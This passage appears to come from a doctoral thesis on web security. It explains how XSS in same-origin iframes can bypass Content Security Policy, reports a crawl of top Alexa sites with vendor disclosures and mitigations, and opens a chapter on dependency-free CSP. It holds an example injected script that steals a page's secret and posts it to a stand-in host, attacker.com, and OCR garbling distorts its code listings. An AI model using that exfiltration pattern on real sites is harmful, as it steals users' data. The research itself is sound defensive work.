default-src ’ n on e ’ ; sc r i pt - sr c ’ s e lf ’ ; ch il d -s r c ’ s e lf ’

Listing 3.3 – CSP of http://main.com/A.html.

This CSP provides an effective protection against XSS:

Only the parent page has CSP

According to CSP21, only the CSP of the iframe applies to its content, and it completely

ignores the CSP of the including page. In our case, if there is no CSP in B.html then its

resource loading is not restricted. As a result, an iframe B.html without CSP is potentially

vulnerable to XSS, since any injected code may be executed within B.html with no restric-

tions. Assume B.html was exploited by an attacker injecting a script injected.js. Besides

taking control over B.html, this attack now propagates to the including page A.html, as

we show in Fig. 3.1. The XSS attack extends to the including parent page because of the

inconsistency between the CSP and SOP. When a parent page and an iframe are from the

same origin according to SOP, a parent and an iframe share the same privileges and can

access each other’s code and resources.

As per our example, injected.js is shown in Listing 3.4.

This script executed in B.html retrieves the secret value from its parent page (parent.secret)

and transmits it to an attacker’s server http://attacker.com via XMLHttpRequest 2.

function s en d D a ta ( ob j , u rl ) {

var req =new XMLHttpRequest();

req.open(’ P OS T ’ , u rl , true) ;

r eq . se n d ( J S ON . s tr i n gi f y ( o bj ) ) ;

}

s en dD a ta ( { s ec re t : p a re n t. s ec re t } , ’ h tt p : / / a t ta c k e r. c o m / s e nd . p h p ’

);

Listing 3.4 – Source code of injected.js.

A straightforward solution to this problem is to ensure that the protection mechanism

for the parent page also propagates to the iframes from the same domain. Technically, it

means that the CSP of the iframe should be the same or more restrictive than the CSP

of the parent. In the next example we show that this requirement does not necessarily

prevent possible CSP violations due to SOP.

Only the iframe has CSP

Consider a different web application, where the including parent page A.html does not

have a CSP, while its iframe B.html contains a CSP from Listing 3.3. In this example,

B.html, shown in Listing 3.5 now contains some sensitive information stored in secret.js

(see Listing 3.2).

< ht ml >

...

</html>

Listing 3.5 – Source code of http://main.com/B.html.

1. https://www.w3.org/TR/CSP2/#which-policy-applies

2. The XMLHttpRequest is not forbidden by the SOP for B.html because an attacker has activated the

Cross-Origin Resource Sharing mechanism [265] on her server http://attacker.com.

PUT(0,-845.90042)

42 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

Since the including page A.html now has no CSP, it is potentially vulnerable to XSS, and

therefore may have a malicious script injected.js. The iframe B.html has a restrictive

CSP, that effectively contributes to protection against XSS. Since A.html and B.html are

from the same origin, the malicious injected script can profit from this and steal sensitive

information from B.html. For example, the script may call the sendData function with

the secret information:

s en d Da t a ({ s e cr e t: c h il d re n [ 0] . s ec r et } , ’ h t tp : / / a t t ac k e r .c o m /

send.php’) ;

Thanks to SOP, the script injected.js fetches the secret from it’s child iframe B.html

and sends it to http://attacker.com.

CSP violations due to origin relaxation

A page may change its own origin with some limitations. By using the document.domain

API, the script can change its current domain to a superdomain. As a result, a shorter

domain is used for the subsequent origin checks 3.

Consider a slightly modified scenario, where the main page A.html from http://main.com

includes an iframe B.html from its sub-domain http://sub.main.com. Any script in

B.html is able to change the origin to http://main.com by executing the following line:

document.domain =" m ai n .c om " ;

If A.com is willing to communicate with this iframe, it should also execute the above-written

code so that the communication with B.html will be possible. The content of B.html is

now treated by the web browser as the same-origin content with A.html, and therefore any

of the previously described attacks become possible.

Categories of CSP violations due to SOP

We distinguish three different cases when the CSP violation might occur because of SOP:

Only the parent page or iframe has CSP : a parent page and an iframe page are

from the same origin, but only one of them contains a CSP. The CSP may be violated

due to the unrestricted access of a page without CSP to the content of the page with

CSP. We demonstrated this example in Sections 2.1 and 2.1.

Parent and iframe have different CSPs A parent page and an iframe page are from

the same origin, but they have different CSPs. Due to SOP, the scripts from one

page can interfere with the content of another page thus violating the CSP.

CSP violation due to origin relaxation A parent page and an iframe page have the

same higher level domain, port and scheme, but however they are not from the same

origin. Either CSP is absent in one of them, or they have different CSPs – in both

cases CSP may be violated because the pages can relax their origin to the high level

domain by using document.domain API, as we have shown in Section 2.1.

3 Empirical study of CSP violations

We performed a large-scale study on the top 10,000 Alexa sites to detect whether CSP

may be violated due to an inconsistency between CSP and SOP. To collect the data, we

3. https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy#Changing_

origin

PUT(0,-845.90042)

3. EMPIRICAL STUDY OF CSP VIOLATIONS 43

used CasperJS [238] on top of PhantomJS headless browser [205]. The User-Agent HTTP

header was instantiated as a Google Chrome browser version 51.

3.1 Methodology

Figure 3.2 – Data Collection and Analysis Process

The overview of our data collection and CSP comparison process is given in Figure 3.2. The

main difference in our data collection process from previous works on CSP measurements

in the wild [177,267] is that we crawled not only the main pages of each site, but also pages

with at least the same TLD+2 component as the site. First, we collected pages accessible

through links of the main page and pointing to the same site. Second, to detect possible

CSP violations due to SOP, we collected all the iframes present on the home pages and

linked pages.

Data collection

Home page crawler For each site in the top 10,000 Alexa list, we crawled the home

page, parsed its source code and extracted three elements:

(1) a CSP of the site’s home page stored in HTTP header as well as in <meta> HTML

tag; we denoted the CSPs of the home page by C;

(2) to extract more pages from the same site, we analyzed the source of the links via <a

href=...> tag and extracted URLs that point to the same site, we denoted this list

by L.

(3) we collected URLs of iframes present on the home page via <iframe src=...> tag

and recorded only those belonging to the same site, we denoted this set by F.

Page crawler We crawled all the URLs from the list of pages L, and for each page we

repeated the process of extraction of CSP and relevant iframes, similar to the steps (1) and

(3) of the home page crawler. As a result, we got a set of CSPs of linked pages CLand a

set of iframes URLs FLthat we extracted from the linked pages in L.

Iframe crawler

For every iframe URL present in the list of home page iframes FH, and in the list of linked

pages iframes FL, we extracted their corresponding CSPs and stored in two sets: CFfor

home page iframes and CLF for linked page iframes.

CSP adoption analysis

Since CSP is considered an effective countermeasure for a number of web attacks, program-

mers may use it to mitigate such attacks on the main pages of their sites. However, if CSP

PUT(0,-845.90042)

44 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

is not installed on some pages of the same site, this can potentially leak to CSP violations

due to the inconsistency with SOP when another page from the same origin is included as

an iframe (see Figure 3.1). In our database, for each site, we recorded its home page, a

number of linked pages and iframes from the same site. This allowed us to analyse how

CSP is adopted at every popular site by checking the presence of CSP on every crawled

page and iframe of each site. To do so, we analyzed the extracted CSPs: Cfor the home

page, CLfor linked pages, CFfor home page iframes, and CLF for linked pages iframes.

CSP violations detection

To detect possible CSP violations due to SOP, we analyzed home pages and linked pages

from the same site, as well as iframes embedded into them.

CSP selection

To detect CSP violations, we first removed all the sites where no parent page and no iframe

page contained a CSP. For the remaining sites, we pointwise compared (1) the CSPs of the

home pages Cand CSPs of iframes present on these pages CF; (2) the CSPs of the linked

pages CLand CSPs of their iframes CLF . To check whether a parent page CSP and an

iframe CSP are equivalent, we applied the CSP comparison algorithm (Figure 3.2)

CSP preprocessing We first normalized each CSP, by splitting it into its directives.

— If default-src directive was present (default-src is a fallback for most of the other

directives), we extracted the source list sof default-src. We analyzed which di-

rectives were missing in the CSP, and explicitly added them with the source list

— If default-src directive was missing, we computed the list of directives not present

in the CSP. In this case, there are no restrictions in CSP for every absent directive.

We therefore explicitly added them with the most permissive source list. A missing

script-src is assigned * ’unsafe-inline’ ’unsafe-eval’ as the most permissive source

list [275].

— In each source list, we modified the special keywords: (i) ’self’ was replaced with

the origin of the page containing the CSP; (ii) in the case both ’unsafe-inline’ and

hashes or nonces are in the source list, we removed ’unsafe-inline’ from the directive

since it will be ignored by the CSP2 [275]. (iii) ’none’ keywords were removed from

all the directives; (iv) nonces and hashes were removed from all the directives since

they cannot be compared; (iv) each whitelisted domain was extended with a list of

schemes and port numbers from the URL of the page where the CSP was deployed 4.

CSP comparison We compared all the directives present in the two CSPs to identify

whether the two policies required the same restrictions. Whenever the two CSPs were differ-

ent, our algorithm returned the names of directives that did not match. The demonstration

of the comparison is accessible on [42]. For each directive in the policies we compared the

source lists and the algorithm proceeded if the elements of the lists were identical in the

normalized CSPs.

Limitations

Our methodology and results have two(2) limitations that we explain here.

4. For example, according to CSP2, if the page scheme is https, and a CSP contains a source

example.com, then the user agent should allow content only from https://example.com, while if the

current scheme is http, it would allow both http://example.com and https://example.com.

PUT(0,-845.90042)

3. EMPIRICAL STUDY OF CSP VIOLATIONS 45

Sites successfully crawled 9,885

Pages visited 1,090,226

Pages with iframe(s) from the

same site

648,324

Pages with same-origin iframe(s) 92,430

Pages with same-origin iframe(s)

where page and/or iframe has

CSP

692

Pages with CSP 21,961 (2.00%)

Sites with CSP on home page 228 (2.3%)

Sites with CSP on some pages 523 (5.29%)

Table 3.1 – Crawling statistics

User interactions The automatic crawling process did not include any real-user-like in-

teractions with top sites. As such, the set of iframes and links URLs we analyzed is an

underestimate of all links and iframes a site may contain.

Pairs of (parent-iframe) In this work, we considered CSP violations in same origin (par-

ent, iframe) couples only. There are further combinations such as couples of sibling iframes

in a parent page that we could have considered. Overall, our results are conservative, since

the problem might have been worst without those limitations.

3.2 Results on CSP adoption

The crawling of Alexa top 10,000 sites was performed in the end of August, 2016. To extract

several pages from the same site, we also crawled all the links and iframes on a page that

pointed to the same site. In total, we gathered 1,090,226 pages from 9,885 different sites.

As a median, from each site we extracted 45 pages, with a maximum number of 9,055 pages

found on tuberel.com. Our crawling statistics is presented in Table 3.1. More than half of

the pages contained an iframe, and 13% of pages did contain an iframe from the same site.

This indicates the potential surface for the CSP violations, when at least one page on the

site has a CSP installed. We discuss such potential CSP violation in details in Section 3.3.

Similarly to previous works on CSP adoption [177,267], we found that CSP was present

on only 228 out of 9,885 home pages (2.31%). Extending this analysis to almost a million

pages, we found a similar rate of CSP adoption (2.00%).

Figure 3.3 – Percentage of pages with CSP per site

Differently from previous studies that analyzed only home pages, or only pages in separa-

tion, we analyzed how many sites have at least some pages that adopted CSP. We grouped

PUT(0,-845.90042)

46 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

Same-origin

parent-iframe

Possible to re-

lax origin

Total

Only parent page has CSP 831,388 1,471

Only iframe has CSP 16240 256

Different CSPs in parent page and iframe 7044 114

No CSP violations 551 109 660

CSP violations total 169 (23.5%) 1,672 (94%) 1841

Table 3.2 – Statistics CSP violations due to Same-Origin Policy

Same-origin parent-iframe Possible to relax origin

Only parent page CSP yandex.ru twitter.com, yandex.ru,

mail.ru

Only iframe CSP amazon.com, imdb.com –*

Different CSP twitter.com –*

*Not found in top 100 Alexa sites.

Table 3.3 – Sample of sites with CSP violations due to Same-Origin Policy

all pages by sites, and found that 5.29% of sites contain some pages with CSPs. This means

website developers are aware of CSP which for some reasons is not widely adopted on all

the pages of the site.

We then analyzed how many pages on each site have adopted CSPs. For each of the 523

sites, we counted how many pages (including home page, linked pages and iframes) have

CSPs. Figure 3.3 shows that more than half of the sites had a very low CSP adoption

on their pages: on 276 sites out of 529, CSP is installed on only 0-10% of their pages.

This becomes problematic if other pages without CSP are not XSS-free. However, it is

interesting to note that around a quarter of sites do profit from CSP by installing it on

90-100% of their pages.

3.3 Results on CSP violations due to SOP

As described in Section 2.1, we distinguish several categories of CSP violations when a

parent page and an iframe on this page are from the same origin according to SOP. To

account for possible CSP violations, we only considered cases when either parent, or iframe,

or both have a CSP installed. From all the 21,961 pages that have CSP installed, we

removed the pages, where CSPs are in report-only mode, leaving 18,035 pages with CSPs

in enforcement mode.

Table 3.2 presents possible CSP violations due to SOP.

We extracted the parent-iframe couples that might cause a CSP violation either because

(1) only the parent or the iframe installed a CSP, or (2) both installed different CSPs.

First, to account for direct violations because of SOP, we distinguished couples where

parent and iframe were from the same origin (columns 2,3), we found 720 cases of such

couples. Second, we analyzed possible CSP violations due to origin relaxation: we have

collected 1,781 couples that are from different origins but their origins could be relaxed by

document.domain API (see more in Section 2.1) – these results are shown in column 3.

In Table 3.3 we present the names of the domains out of the top 100 Alexa sites, where

we found different CSP violations. Each company in this table has been notified about the

possible CSP violations. Concrete examples of the page and iframe URLs and their corre-

PUT(0,-845.90042)

3. EMPIRICAL STUDY OF CSP VIOLATIONS 47

sponding CSPs for such violations can be found in the corresponding technical report [253].

All the collected data is available online [42].

CSP violations in presence of document.domain According to our results, in presence of

document.domain, 94% of (parent, iframe) pages can have their CSP violated. Those

violations can occur only if both parent and iframes pages execute document.domain

to the same top level domain. Thus, our result is an over-approximation, assuming

that document.domain is used in all of those pages and iframes. According to [27],

document.domain is used in less than 3% of web pages.

Only the parent page or the iframe has CSP

We first considered a scenario where a parent page and an iframe are from the same origin,

but only one of them contains a CSP. Intuitively, if only a parent page has CSP, then

an iframe can violate CSP by executing any code and accessing the parent page’s DOM,

inserting content, access cookies etc. Among 720 parent-iframe couples from the same

origin, we found 83 cases (11.5%) where only the parent had a CSP, and 16 cases (2.2%)

where only the iframe had a CSP. These CSP violations originated from 13 (for parent)

and 4 (for iframe) sites. For example, such possible violations are found on some pages

of amazon.com,yandex.ru and imdb.com (see Table 3.3). CSP of a parent or iframe may

also be violated because of origin relaxation. We identified 1,388 cases (78%) of parent-

iframe couples where such violation may occur because CSP is present only in the parent

page. This was observed on 20 different sites, including twitter.com, yandex.ru and others.

Finally, in 240 cases (13.5%) only the iframe had CSP installed, which was found on 11

different sites. We manually checked the parent and iframes involved in CSP violations

for sites in Table 3.3. In all of those sites, either the parent or the iframe page was a

CSPEvaluator 5, proposed by Weichselbaum et al. [267]. We found out that the CSPs

involved in these pages are all bypassable.

Parent and iframe have different CSPs

In a case where a page and iframe are from the same origin, but their corresponding CSPs

are different, this may also cause a violation of CSP. From the 720 same-origin parent-

iframe couples, we found 70 cases (9.7%) (from 3 sites) where their CSPs differed, and for

an origin relaxation (from 6 sites) case, we identified only 44 such cases (2.5%). This

setting was found on some pages of twitter.com for instance.

We further analyzed the differences in CSPs found on parent and iframe pages. For all the

114 pairs of parent-iframe (either same-origin or possible origin relaxation), we compared

the policies they installed, directive-by-directive. Figure 3.4 shows that every parent CSP

and iframe CSP differed on almost every directive – between 90% and 100%. The only

exception is frame-ancestors directive, which is almost the same in different parent pages

and iframes. If properly set, this directive gives a strong protection against clickjacking

attacks [244], therefore equally protecting all the pages from the same origin.

Potential CSP violations

Apotential CSP violation may happen in a site, where some pages have CSP and

some others do not, or pages have different CSPs. When those pages get nested as parent-

iframe, we can run into CSP violations, just like in the direct CSP violation cases we

5. https://csp-evaluator.withgoogle.com/

PUT(0,-845.90042)

48 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

Figure 3.4 – Differences in CSP directives for parent and iframe pages

Pages Origins Sites

A same origin page has no CSP 4381 197 197

A same origin page has a different CSP 1223 23 23

Total Potential violations due to same

origin pages

5604 (31.1%) - -

A same origin (after relaxation) page

has no CSP

4728 340 183

A same origin (after relaxation) has a

different CSP

2567 135 44

Total Potential violations due to same

origin (after relaxation)

7295(40.4%) - -

Potential violations total 12899 (72%) 591 (81%) 379 (52%)

Table 3.4 – Potential CSP violations in pages with CSP

reported above. To assess how often such violations may occur, we analyzed the 18,035

pages that had CSP in enforcement mode. These pages originated from 729 different

origins spread over 442 sites. Table 3.4 shows that 72% of CSPs (12,899 pages) could be

potentially violated, and these CSPs originated from pages of 379 different sites (85.75%).

To detect these violations, for each page with a CSP in our database, we checked whether

there existed another page from the same origin that did not have CSP. The page without

a CSP could embed the page with CSP, leading to CSP violations because of SOP. We

detected 4,381 such pages (24%) from 197 origins. Similarly, we detected 1,223 same-origin

pages (7%) with different CSPs. We also analyzed cases where potential CSP violations

may happen due to origin relaxation. We detected 4,728 pages (26%), whose CSP may be

violated because of other pages with no CSP, and 2,567 pages (14%), whose CSP may be

violated because of different CSPs on other relaxable-origin pages.

For the pages that have different CSPs, we compared how much their CSPs differed. Fig-

ure 3.5 shows that CSPs mostly differed in the script-src directive, which protects pages

from XSS attacks [41]. This means, that if one page in the origin does whitelist an at-

tacker’s domain or an insecure endpoint [267], all the other pages in the same origin become

vulnerable because they may be inserted as an iframe to the vulnerable page and their CSPs

could be easily violated.

PUT(0,-845.90042)

4. AVOIDING CSP VIOLATIONS 49

Figure 3.5 – Differences in CSP directives for same-origin and relaxed origin pages

3.4 Responses of websites owners

We reported those issues to a sample of site owners, using either HackerOne 6, or contact

forms when available. Here are some selected quotes from our discussions with them.

“Yes, of course we understand the risk that under some circumstances XSS

on one domain can be used to bypass CSP on another domain, but it’s simply

impossible to implement CSP across all (few hundreds) domains at once on the

same level. We are implementing strongest CSP currently possible for different

pages on different domains and keep going with this process to protect all pages,

after that we will strengthen the CSP. We believe it’s better to have stronger

CSP policy where possible rather than have same weak CSP on all pages or

not having CSP at all. Having in mind there are hundreds of domains within

mail.ru, at least few years are required before all pages on all domains can have

strong CSP.” – Mail.ru

“[...]the sandbox is a defense in depth mitigation[...]. We definitely don’t allow

relaxing document.domain on www.dropbox.com[...]” – Dropbox.com

“While this is an interesting area of research, are you able to demonstrate that

this behavior is currently exploitable on Twitter? It appears that the behavior

you have described can increase the severity of other vulnerabilities but does not

pose a security risk by itself. Is our understanding correct? [...]We consider this

to be more of a defensive in depth and will take into account with our continual

effort to improve our CSP policy” – Twitter.com

“I believe we understand the risk as you’ve described it.” – Imdb.com

4 Avoiding CSP violations

Preventing CSP violations due to SOP can be achieved by having the same effective CSP

for all same-origin pages in a site, and preventing origin relaxation.

Origin-wide CSP: Using CSP for all same-origin pages can be manually done but this

solution is error-prone. A more effective solution is the use of a specification such as Origin

Policy [274] in order to set a header for the whole origin.

6. https://hackerone.com

PUT(0,-845.90042)

50 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

Preventing origin relaxation: Having an origin-wide CSP is not enough to prevent

CSP violations. By using origin relaxation, pages from different origins can bypass the

SOP [248]. Many authors provide guidelines on how to design an effective CSP [267].

Nonetheless, even with an effective CSP, an embedded page from a different origin in the

same site can use document.domain to relax its origin. Preventing origin relaxation is

therefore trickier.

Programmatically, one could prevent other scripts from modifying document.domain by

making a script run first in a page [262]. The first script that runs on the page would be:

Object.defineProperty( document , " domain", { __ p r ot o __ : null ,

wri t a bl e : false, c on f ig u ra bl e : fa l se } ) ;

A parent page can also indirectly disable origin relaxation in iframes by sandboxing them.

This can be achieved by using sandbox as an attribute for iframes or as directive for the

parent page CSP. Unfortunately, an iframe cannot indirectly disable origin relaxation in

the page that embeds it. However, the frame-ancestors directive of CSP gives an iframe

control over the hosts that can embed it. Finally, a more robust solution is the use of a

policy to deprecate document.domain as proposed in the draft of Feature policy [276]. The

feature policy defines a mechanism that allows developers to selectively enable and disable

the use of various browser features and APIs.

Iframe sandboxing: Combining attribute allow-scripts and allow-same-origin as val-

ues for sandbox successfully disables document.domain in an iframe 7. We recommend

the use of sandbox as a CSP directive, instead of an HTML iframe attribute. The first

reason is that sandbox as a CSP directive, automatically applies to all iframes that are in

a page, avoiding the need to manually modify all HTML iframe tags. Second, the sandbox

directive is not programmatically accessible to potentially malicious scripts in the page,

as is the case for the sandbox attribute (which can be removed from an iframe program-

matically, replacing the sandboxed iframe with another identical iframe but without the

sandbox attribute).

Limitations An origin-wide CSP (the same CSP for all same origin pages) can become

very liberal if all same origin pages do not require the same restrictions. In order to

implement the solution we propose, one needs to consider the intended relation between a

parent page and an iframe page, in presence of CSP. In the case where the two(2) pages

should be allowed direct access to each other’s context, then, since same origin pages can

bypass page-specific security characteristics [208], the solution is to have the same CSP for

both the page and the iframe. However, if direct access to each other’s context is not a

required feature, one can keep different CSPs in parent and iframe, or have no CSP at all

in one of the parties, but their contents should be isolated from each other. The solution

here is to use sandboxing. Nonetheless, there are other means (such as postMessage) by

which one can securely achieve communication between the pages.

5 Inconsistent implementations

Combining origin-wide CSP with allow-scripts sandbox directive would have been suffi-

cient at preventing the inconsistencies between CSP and the same origin policy. Unfortu-

nately, we have discovered that for some browsers, this solution is not sufficient. Starting

7. We found out that dropbox.com actually puts sandbox attribute for all its iframes, and therefore

avoids the possible CSP violations. We have had a very interesting discussion on Hackerone.com with De-

vdatta Akhawe, a Security Engineer at Dropbox, who told us more about their security practices regarding

CSP in particular.

PUT(0,-845.90042)

5. INCONSISTENT IMPLEMENTATIONS 51

from HTML5, major browsers, apart from Internet Explorer, support the new srcdoc at-

tribute for iframes [203]. Instead of providing a URL whose content will be loaded in an

iframe (using the src attribute), one provides directly the HTML content of the iframe in

the srcdoc attribute. According to CSP2 [275], §5.2, the CSP of a page should apply to

an iframe whose content is supplied in a srcdoc attribute. This is actually the case for all

majors browsers, which support the srcdoc attribute. However, there is a problem when

the sandbox attribute is set to an srcdoc iframe.

Webkit-based 8and Blink-based 9browsers (Chrome, Chromium, Opera) always comply

with CSP. The CSP of a page will apply to all srcdoc iframes, even in those iframes

which have a different origin than that of the page, because they are sandboxed without

allow-same-origin .

In contrast, we noticed that in Gecko-based browsers (Mozilla Firefox), the CSP of the

page applies to that of the srcdoc iframe if and only if allow-same-origin is present as

value for the attribute. Otherwise it does not apply. The problem with this choice is

the following. A third party script, whitelisted by the CSP of the page, can create a

srcdoc iframe, sandboxing it with allow-scripts only, and load any resource that would

normally be blocked by the CSP of the page if applied in this iframe. This way, the third

party script successfully bypasses the restrictions of the CSP of the page. Even though

loading additional scripts is considered harmless in the upcoming version 3 [267,272] of

CSP, this specification says nothing about violations that could occur due to the loading of

other resources inside a srcdoc sandboxed iframe, like resources whitelisted by object-src

directive for instance, additional iframes etc.

We have notified the W3C, and the Mozilla Security Group. Daniel Veditz, a lead at

Mozilla Security Group, recognizes this as a bug and explains:

“Our internal model only inherits CSP into same-origin frames (because in the-

ory you’re otherwise leaking info across origin boundaries) and iframe sandbox

creates a unique origin. Obviously we need to make an exception here (I think

we manage to do the same thing for src=data: sandboxed frames).”

CSP specification and srcdoc iframes The problem of imposing a CSP to an un-

known page is illustrated by the following example [271]. If a trusted third party library,

whitelisted by the CSP of the page, uses security libraries inside an isolated context (by

sandboxing them in a srcdoc iframe, setting allow-scripts as sole value for the sandbox)

then, the page’s CSP will block the security libraries and possibly introduce new vulnera-

bilities. Because of this, it was unclear to us what the intent of CSP designers regarding

srcdoc iframes was. Mike West, one of the CSP editors at the W3C and also Developer

Advocate in Google Chrome’s team, clarified this to us:

“I think your objection rests on the notion of the same-origin policy preventing

the top-level document from reaching into it’s sandboxed child. That seems

accurate, but it neglects the bigger picture: srcdoc documents are produced

entirely from the top-level document context. Since those kinds of documents

are not delivered over the network, they don’t have the opportunity to deliver

headers which might configure their settings. We impose the parent’s policy in

these cases, because for all intents and purposes, the srcdoc document is the

parent document.”

8. https://en.wikipedia.org/wiki/WebKit

9. https://en.wikipedia.org/wiki/Blink_(web_engine)

PUT(0,-845.90042)

52 CHAPTER 3. CSP VIOLATIONS DUE TO SOP

6 Conclusion

In this work, we have revealed a new problem that can lead to violations of CSP. We have

performed an in-depth analysis of the inconsistency that arises due to CSP and SOP and

identified three cases when CSP may be violated.

To evaluate how often such violations happen, we performed a large-scale analysis of more

than 1 million pages from 10,000 Alexa top sites. We found that 5.29% of sites contain

pages with CSPs (as opposed to 2% of home pages in previous studies).

We also found out that 72% of current web pages with CSP, are potentially vulnerable

to CSP violations. This concerns 379 (72.46%) sites that deploy CSP. Further analyzing

the contexts in which those web pages are used, our results show that when a parent page

includes an iframe from the same origin according to SOP, in 23.5% of cases their CSPs

may be violated. And in the cases where document.domain is required in both parent and

iframes, we identified that such violations may occur in 94% of the cases.

We discussed measures to avoid CSP violations in web applications by installing an origin-

wide CSP and using sandboxed iframes. Finally, our study reveals an inconsistency in

browsers implementation of CSP for srcdoc iframes, that appeared to be a bug in Mozilla

Firefox browsers.

PUT(0,-845.90042)

Chapter 4

DF-CSP: Dependency-Free Content Security Policy

Preamble

In this chapter, we analyze CSP versions and browsers implementations, formalize and

propose rules and rules for building dependency-free policies (DF-CSP).

This chapter is currently under submission.

1 Introduction

From a web application developer’s perspective, deploying a CSP effective at mitigating

content injection attacks and preserving the full functionality of an application can become

quickly challenging for many reasons.

First of all, a good understanding of the global meaning of CSP is important. For instance,

in order to set restrictions on the origins of trusted scripts, one uses the script-src

directive. Nonetheless, it is known that plugins, in particular Adobe Flash plugins, can

execute scripts in web pages. Hence, if no restrictions are set on plugins (if plugins can

load from any origin), then an attacker can inject a malicious plugin, from an origin not

whitelisted by the script-src directive, and execute scripts in the page after the plugin

loads, as it has been demonstrated by Weichselbaum et al. [267]. Also important is the

case of the sandbox directive, which when used in a policy alters the semantics of many

other directives. For instance, its mere use in a policy, automatically prevents plugins,

even if the object-src directive is used to specify a set of trusted origins for plugins.

New directives Deprecated

CSP1 connect-src,default-src,font-src,

frame-src,img-src,media-src,

object-src,script-src,style-src,

sandbox,report-uri

n/a

CSP2 base-uri,child-src,form-action,

frame-ancestors,plugin-types

frame-src

CSP3 disown-opener,manifest-src,

report-to,worker-src

child-src,

report-uri

Table 4.1 – CSP directives by version

The meaning of a CSP policy also depends on the version of the standard that the browser

implements. There are three versions of the CSP standard [261,272,275], with CSP3 [272]

PUT(0,-845.90042)

54 CHAPTER 4. DEPENDENCY-FREE CSP

being the most recent one (See Table 4.1 for a summary of the changes among versions).

Each new version builds on anterior ones, with its set of changes, potentially backwards

incompatible with anterior versions, but with the aim at improving the effectiveness of the

specification and ease of adoption by web application developers. In particular, a major

feature at the heart of CSP3 is the concept of trust propagation for easily loading dynamic

scripts. This is achieved with the introduction of the new ’strict-dynamic’ keyword to be

used with the script-src directive [267]. Its semantics is that, a script which is whitelisted

with a nonce or a hash, is allowed to further load any additional scripts even though such

scripts are not explicitly whitelisted in the policy. From a security perspective, the use

of ’strict-dynamic’ can give attackers different power depending on the version of CSP

considered. In fact, an attacker who compromises a trusted script, can load arbitrary script

if the underlying browser supports CSP3, but not in CSP1 and CSP2-compliant browsers

where the attacker is bound by the whitelisted origins1.

Moreover, browser vendors follow the evolution of CSP specifications at their own pace.

While some of them quickly take up the latest improvements to the specification, others do

not simply have a support of it all, or have a limited support of it. To add to this complexity,

CSP does not offer to developers the possibility to deliver different CSP policies according

to the version of CSP that the client’s browser implements. Rather, the policy which is

deployed by the application will be interpreted by the browser according to which version

of CSP it supports. This leads to different meanings for a single CSP, as a policy which is

deployed will be interpreted by a browser according to its implementation of CSP.

Ultimately, web applications would have to maintain multiple policies, one per browser.

Then when a web page is accessed, the user agent will be detected, in order to serve the

appropriate CSP. Maintaining multiple policies is potentially error-prone, as one has to

keep all of them updated, effective against attacks while preserving the full functionality

of web applications. Moreover, correctly detecting the user browser is crucial, as not

delivering the right policy may potentially break the application’s normal functionality or

fail at mitigating content injection attacks. Unfortunately, detecting the user browser is

not trivial, as this information can be potentially controlled by an attacker. For instance,

browser extensions, which are very popular among users, are able of modifying HTTP

headers. Thus, they can present to web servers a user agent which has nothing to do with

the effective browser of the user. As a matter of fact, we installed the User-Agent Switcher

for Chrome [147] extension on a Chrome/68.0.3440.75. By changing the User-Agent to

Opera 12.14, Facebook and Twitter stopped sending any CSP with their responses, while

they sent a CSP in a normal setting. This leaves the application unprotected against

content injection attacks, while the underlying browser is fully CSP-compliant.

In this work, we introduce the notion of dependency-free policies (DF-CSP), for web ap-

plications developers to write and deploy policies that preserve the full functionality of

web applications and that are effective at mitigating attacks, irrespective of the browser in

which the application runs and the version of CSP supported by the browser. By building

and deploying a DF-CSP, a web application developer maintains only a single policy and

always serves the same CSP to all browsers without relying on user agent detection, as it

could be potentially controlled by an adversary.

We scrutinize the CSP standard to find all dependencies and perform tests in browsers to

assess their implementation of the specification. We then formalize and refer to these as

dependencies. We formally define the notion of dependency-free policies (DF-CSP) and

propose a set of provable correct rewriting rules that can be used to resolve dependencies

in order to build dependency-free policies. These rules are mostly meant for developers

1. The attacker cannot read nonces, but can control the URLs of parser-inserted scripts

PUT(0,-845.90042)

1. INTRODUCTION 55

willing to ensure that their policies will be similarly enforced in different browsers. Some

of our rewriting rules, in particular those related to the sandbox directive that alters the

semantics of many directives, can also be implemented by browser vendors to comply with

the specification. As a matter of fact, we found no browsers correctly implementing the

sandbox directive.

Dependency-free policies are also useful to reason about CSP policies with the formal

semantics of Calzavara et al. [179] that calculates the global meaning of CSP policies by

adding the meanings of each individual directive. In this formal semantics, the global

semantics of a CSP policy follows from the semantics of individual directive values. This

is however not correct unless the CSP does not present any dependencies, because the

meaning of individual directives could be altered by other directives.

Finally, we discuss the security implications of the use of ’strict-dynamic’ in policies. In

fact, the use of ’strict-dynamic’ in backwards compatible policies such as DF-CSP, can

give attackers different attack power depending on the version of CSP considered, especially

in CSP3 where an attacker could potentially inject arbitrary content in the application.

We show that automatically generating a second policy out of a policy that makes use of

’strict-dynamic’, successfully ensures that an attacker who compromises a script allowed

by a DF-CSP, does not gain more power, irrespective of the browser in which the application

executes.

To assess how many sites in the wild could potentially benefit from building DF-CSP, we

collected an analyzed the CSPs of top 100k Alexa sites. The results show that thousands

of these websites can benefit from our rewriting rules for building dependency-free policies,

either because they maintain multiple policies, or because they (see Table 4.7 for the

results) deploy CSP that exhibit any of the dependencies we have formalized. To help

build DF-CSP, we propose a new tool to assist developers in (1) building effective policies

based on the state of the art and (2) understand the global meaning of their CSP policies

by means of semantics and directive dependencies.

In summary, towards a better understanding of the global meaning of CSP policies, we

make the following contributions:

— we identify, define, and formalize directive dependencies. These are a set of directive

which implicit relations and individual meanings can lead to policies being differently

interpreted depending on the version of CSP and browser implementation under

consideration. In doing so, we find problems in CSP formal semantics and browsers

implementation of CSP.

— we propose and implement a rewriter (a set of rewriting rules) for building dependency-

free policies (DF-CSP) whose semantics are independent of any particular CSP version

or browser implementation. At the core of DF-CSP is the mitigation of attacks as well

as the preservation of the full functionality of web applications.

— We discuss how to deploy backwards compatible policies such as DF-CSP, along with

the’strict-dynamic’ keyword, without giving attackers more power in case they

compromise a trusted script. Automatically generating and deploying a second policy

out of a DF-CSP that uses ’strict-dynamic’, successfully prevents an attacker from

gaining more power even in CSP3-compliant browsers.

— we collect and analyze CSPs of the top 100k Alexa sites, and find that CSP policies

in the wild often deploy non dependency-free policies, giving a lower bound on the

number of web applications which may benefit from our DF-CSP. In other words,

either they serve the same CSP, in which case their policy is non DF-CSP, or they

serve different CSP based on the User-Agent we sent, in which case they maintain

